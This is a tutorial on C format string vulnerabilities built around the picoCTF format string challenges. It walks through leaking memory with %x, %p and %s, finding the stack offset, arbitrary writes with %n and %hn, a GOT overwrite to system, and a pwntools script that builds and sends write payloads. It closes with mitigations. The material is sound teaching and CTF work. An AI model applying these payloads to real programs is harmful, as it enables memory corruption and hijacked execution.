Introduction
A format string vulnerability occurs when a C program passes user-controlled input directly as the format string argument of printf or a related function. Instead of treating the input as data to print, printf interprets it as a format string and acts on any % specifiers it contains. An attacker can use this to read arbitrary memory and, in some cases, write to any address in the process.
This vulnerability class is at the heart of the picoCTF format string series: format string 0, format string 1, format string 2, and format string 3. Each challenge adds one more concept. Work through them in order.
How printf works
The printf family of functions reads a format string and consumes additional arguments from the call stack to fill in each format specifier. When called correctly it looks like this:
printf("%s scored %d points", username, score);
// The format string is a string literal, not user input.
The vulnerable version passes user input as the format string:
char buf[256];
fgets(buf, sizeof(buf), stdin);
printf(buf); // BUG: buf is user-controlled
When printf encounters %s in the format string it looks on the stack for the next argument (a pointer to a string) and dereferences it. If the caller never provided that argument, printf reads whatever happens to be on the stack at that position, which is attacker-readable process memory.
If printf("%s", buf) is used instead, the input is always treated as a plain string and no specifiers are interpreted.
Reading memory with %x and %s
Send %x specifiers to dump stack values as hex integers. Each %x consumes one word from the stack:
$ echo '%x %x %x %x %x %x %x %x' | ./vulnerable
f7f9e580 0 0 0 f7f5a700 61616161 25207825 78252078
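The words in a dump like this are easier to interpret once they are converted back to bytes. The sketch below is illustrative only: it assumes a 32-bit little-endian target, and decode_word is a hypothetical helper name, not part of any library. It reuses the sample output shown above.

```python
import struct

def decode_word(hex_word):
    """Return the 4 bytes of a leaked 32-bit word in memory (little-endian) order."""
    return struct.pack("<I", int(hex_word, 16))

# Sample leak copied from the output above.
leak = "f7f9e580 0 0 0 f7f5a700 61616161 25207825 78252078"

for position, word in enumerate(leak.split(), start=1):
    # Printable results usually mean the word is part of your own input.
    print(position, word, decode_word(word))
```

Words that decode to printable text, such as 25207825 (the characters "%x %"), are typically pieces of the format string itself sitting on the stack.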
Use %p instead of %x to get pointer-width output with a 0x prefix. This matters on 64-bit systems, where %x prints only the low 32 bits of each value:
$ echo '%p %p %p %p %p %p' | ./vulnerable
If you want to read from a specific stack offset without cycling through all the preceding ones, use the positional argument syntax %N$x where N is the index:
$ echo '%6$x' | ./vulnerable # read the 6th stack word
$ echo '%6$p' | ./vulnerable # same, as a pointer
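To make the difference between sequential and positional specifiers concrete, here is a toy model in Python. It is not how printf is implemented: the stack list stands in for the words printf would read, toy_printf is a made-up name, and only %x and %N$x are handled.

```python
import re

def toy_printf(fmt, stack):
    """Toy model: every %x or %N$x prints one word from `stack` (1-indexed)."""
    next_index = 1  # index consumed by the next plain %x
    out = []
    pos = 0
    for match in re.finditer(r"%(?:(\d+)\$)?x", fmt):
        out.append(fmt[pos:match.start()])
        if match.group(1):  # positional form: jump straight to word N
            index = int(match.group(1))
        else:               # sequential form: take the next unread word
            index = next_index
            next_index += 1
        out.append(format(stack[index - 1], "x"))
        pos = match.end()
    out.append(fmt[pos:])
    return "".join(out)

# Hypothetical stack contents, mirroring the sample dump earlier in this section.
stack = [0xF7F9E580, 0, 0, 0, 0xF7F5A700, 0x61616161]
print(toy_printf("%x %x %x", stack))
print(toy_printf("%6$x", stack))
```

The point of the model is that neither form checks whether the caller actually supplied an argument; both simply index into whatever words are there.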
To dereference a pointer on the stack and read the string it points to, use %s:
$ echo '%6$s' | ./vulnerable # dereference the 6th stack word as a string
%s will crash the program if the value at the target position is not a valid readable pointer. Use %x or %p first to identify which positions hold addresses, then dereference specific ones.
Finding the format string offset
The key skill in format string exploitation is finding the offset at which your own input appears on the stack. Once you know it, you can place an address in the input and use %N$s to dereference it, or %N$n to write to it.
The technique is to start the input with a recognizable marker like AAAA (hex value 0x41414141) and then scan the stack output for that value:
$ echo 'AAAA %x %x %x %x %x %x %x %x %x %x' | ./vulnerable
AAAA f7f9e580 0 0 0 f7f5a700 41414141 25207825 ...
#                            ^^^^^^^^
# This is our AAAA, at position 6
In the example above, our marker appears at the 6th position. We can confirm this with:
$ echo 'AAAA %6$x' | ./vulnerable
AAAA 41414141 # confirmed: offset is 6
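On 64-bit systems, use 8-byte markers (e.g. AAAAAAAA, hex 0x4141414141414141) and look for them in the %p output. On x86-64 Linux the first five positions are filled from registers rather than the stack, so the marker usually shows up at a higher index than on 32-bit.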
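The scan for the marker is easy to automate. The following is a minimal sketch, assuming the leak is a whitespace-separated list of hex words with the echoed marker already stripped from the front; find_offset is a hypothetical helper, not a pwntools function.

```python
def find_offset(leak_output, marker=b"AAAA"):
    """Return the 1-indexed position of `marker` in a leak, or None if absent."""
    # The marker is a run of identical bytes, so byte order does not matter here.
    wanted = int.from_bytes(marker, "little")
    for position, word in enumerate(leak_output.split(), start=1):
        try:
            value = int(word, 16)  # accepts both "41414141" and "0x41414141"
        except ValueError:         # e.g. "(nil)", which glibc prints for a NULL %p
            continue
        if value == wanted:
            return position
    return None

# Words from the example above, without the leading echoed "AAAA".
print(find_offset("f7f9e580 0 0 0 f7f5a700 41414141 25207825"))
# 64-bit style leak with an 8-byte marker (made-up values).
print(find_offset("0x7ffc0000 (nil) 0x4141414141414141", marker=b"AAAAAAAA"))
```

Stripping the echoed marker first matters because a string such as AAAA is itself valid hexadecimal and would otherwise be counted as the first word.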
Writing with %n
The %n specifier prints nothing. Instead, it stores the number of bytes printed so far at the address given by the pointer argument it consumes. This turns a read vulnerability into an arbitrary write: if you can place a target address at a known stack offset, %N$n will write to it.
The value written equals the number of characters already output by printf. Use width padding to control it. For example, to write the value 100 (0x64):
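# Payload text sent to the vulnerable program (not a shell command to run as-is)
# %100c pads the output to exactly 100 characters before %n
# The target address is assumed to be at stack offset 6
%100c%6$n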
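The padding arithmetic changes once the target address itself is part of the input, because those bytes are printed too. The sketch below assumes a 32-bit target with the 4-byte address placed at the very start of the buffer; the address 0x0804a02c and the helper name build_n_payload are made up for illustration.

```python
import struct

def build_n_payload(target_addr, value, offset):
    """Build <addr>%<pad>c%<offset>$n so that %n stores `value` (32-bit sketch)."""
    addr_bytes = struct.pack("<I", target_addr)  # 4 bytes, printed before the padding
    pad = value - len(addr_bytes)                # characters still needed to reach `value`
    if pad < 1:
        raise ValueError("value is too small for this layout")
    return addr_bytes + f"%{pad}c%{offset}$n".encode()

# Hypothetical target address; offset 6 matches the example in the text.
payload = build_n_payload(0x0804A02C, 100, 6)
print(payload)
```

With the address taking 4 of the 100 characters, the width drops from 100 to 96. An address containing a zero byte would cut the string short, which is one reason real payloads often place addresses at the end instead.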
Writing a large value (like a function address) with a single %n would require printing an impractical number of characters. Instead, use %hn (write 2 bytes) or %hhn (write 1 byte) and split the write into multiple partial writes, one chunk at a time. This is the basis of the GOT (Global Offset Table) overwrite technique used in format string 3.
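The split-write bookkeeping can be sketched in a few lines. This is a simplified illustration for a 32-bit value written as two %hn halves, not the algorithm pwntools uses; plan_hn_writes and the sample address are hypothetical. Writes are ordered by value because the printed-character count can only grow.

```python
def plan_hn_writes(target_addr, value, printed=0):
    """Plan two 16-bit %hn writes for a 32-bit value, smallest halfword first.

    Returns a list of (address, halfword, padding) tuples. `printed` is the
    number of characters already output before the first padding specifier.
    """
    halves = [
        (target_addr, value & 0xFFFF),              # low half lives at addr
        (target_addr + 2, (value >> 16) & 0xFFFF),  # high half at addr + 2 (little-endian)
    ]
    plan = []
    for addr, half in sorted(halves, key=lambda item: item[1]):
        # %hn keeps only the low 16 bits of the count, hence the modulo.
        pad = (half - printed) % 0x10000
        plan.append((addr, half, pad))
        printed += pad
    return plan

# Hypothetical example: two 4-byte addresses (8 bytes) are printed first.
for addr, half, pad in plan_hn_writes(0x0804A02C, 0xDEADBEEF, printed=8):
    print(hex(addr), hex(half), pad)
```

A padding of 0 means no padding specifier is needed for that write, since a %c with any width still prints at least one character.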
Use checksec (part of pwntools) to check whether the binary has RELRO. Full RELRO makes the GOT read-only after dynamic linking, preventing GOT overwrites. Partial RELRO (a common default) leaves it writable.
Automating with pwntools
pwntools is a Python library for writing exploit scripts. It handles process I/O, socket connections, and format string payload generation:
pip install pwntools
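from pwn import *

# Placeholder values for illustration; replace them with your own findings
offset = 6                # stack index where your buffer appears
target_addr = 0x0804a02c  # address to overwrite
target_value = 0x64       # value to write
# For 64-bit targets, set context.arch = 'amd64' before building the payload

# Connect to a local process or remote server
p = process('./vulnerable')
# p = remote('challenge.picoctf.org', 12345)

# Send a format string to leak stack values
p.sendline(b'%p %p %p %p %p %p')
leak = p.recvline()
print(leak)

# Build a format string payload that writes target_value to target_addr
payload = fmtstr_payload(offset, {target_addr: target_value})
p.sendline(payload)
p.interactive()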
The fmtstr_payload function from pwntools builds the entire payload for you, handling the address placement, padding arithmetic, and split writes needed to overwrite arbitrary memory. The only inputs you need are the stack offset and a dictionary of address: value pairs to write.
The picoCTF format string series
- format string 0: Introduces the bug conceptually. An overlong format string overflows a buffer and crashes the program in a way that prints the flag. No memory reading required.
- format string 1: Read a secret value off the stack using %x specifiers. Practice scanning for a recognizable pattern in the leak output.
- format string 2: Overwrite a specific variable in memory using %n. Introduces the concept of writing to a known address by placing it in the input buffer.
- format string 3: Full GOT overwrite. Redirect a library function's GOT entry to system so that the next call to that function spawns a shell instead.
Mitigations
Modern compilers and operating systems include several defenses against format string exploits:
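- -Wformat-security: GCC warns when printf is called with a non-literal format string and no further arguments. It is not part of -Wall, so it has to be enabled explicitly (or via -Wformat=2), though some distributions turn it on by default.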
- Full RELRO: marks the GOT read-only after dynamic linking, preventing GOT overwrites.
- ASLR: randomizes where the stack and libraries are loaded, making it harder to hardcode target addresses. An attacker has to leak an address first to get around it.
- Stack canaries: detect adjacent buffer overflows but do not directly mitigate format string writes.
Run checksec ./binary (pwntools) to see which mitigations are active on a CTF binary. Partial RELRO with no PIE is the classic easy-mode setup; Full RELRO with PIE and ASLR requires leaking an address before writing and choosing a write target other than the GOT.
Quick reference
| Specifier | Effect |
|---|---|
| %x | Print the next stack word as hex |
| %p | Print the next stack word as a pointer (0x...) |
| %s | Dereference the next stack word as a string pointer |
| %n | Write the bytes-printed count to the address held in the next stack word |
| %hn | Write 2 bytes (short) instead of 4 |
| %hhn | Write 1 byte |
| %N$x | Print the Nth stack word (1-indexed) as hex |
| %Nc | Print one character padded to width N (controls write value for %n) |
| fmtstr_payload(off, {addr: val}) | pwntools: build a complete write payload |